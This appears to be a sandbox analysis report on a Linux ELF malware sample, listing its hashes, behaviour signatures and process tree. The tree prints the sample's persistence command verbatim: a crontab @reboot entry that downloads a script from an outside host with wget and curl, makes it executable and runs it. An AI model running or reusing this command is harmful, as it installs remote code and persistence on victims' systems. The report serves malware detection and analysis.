Analysis

  • max time kernel
    149s
  • max time network
    136s
  • platform
    ubuntu-22.04_amd64
  • resource
    ubuntu2204-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system
  • submitted
    28-10-2024 01:13

General

  • Target

    721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf

  • Size

    73KB

  • MD5

    47ee0b8842a526fc0c6ff94fe4ca2ad6

  • SHA1

    adf64c9ff9b8d9897fddc7e3014b9c5aea88b964

  • SHA256

    721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443

  • SHA512

    c4ff89dfd2609c7ae0dfa234855be1e0133e8af0bce3afed376135c370eec203ea32c45a1f1d23cbc713717efd36c860478efcfbd85377cd3d17d8051b8f8862

  • SSDEEP

    1536:BFEA/tr50yFqIWfWD7LnaItWpOIfFkDFD:BFEAVZRWfWTnaVEIf0FD

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
    /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:1565
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:1566
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:1568
      • /usr/bin/crontab
        crontab -l
        3⤵
          PID:1569

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /var/spool/cron/crontabs/tmp.FJlr1F

      Filesize

      306B

      MD5

      83171e3b993f7e5156610ec021956f99

      SHA1

      50d0c29250d3df506f2d6d45a6df96ca0164d4ce

      SHA256

      dd334f58ab4dcad925152e554fd9fc0a491f92e0c2ae992bdb2224be25a6cc4a

      SHA512

      34b475c5ea363b48102a902ea127d4f165f435cb85aa1b0dd3ade0cc92e57ff84ccf963dc0688302749992bdc4d834c10b1f75db6b913e07ed5cd814d637106f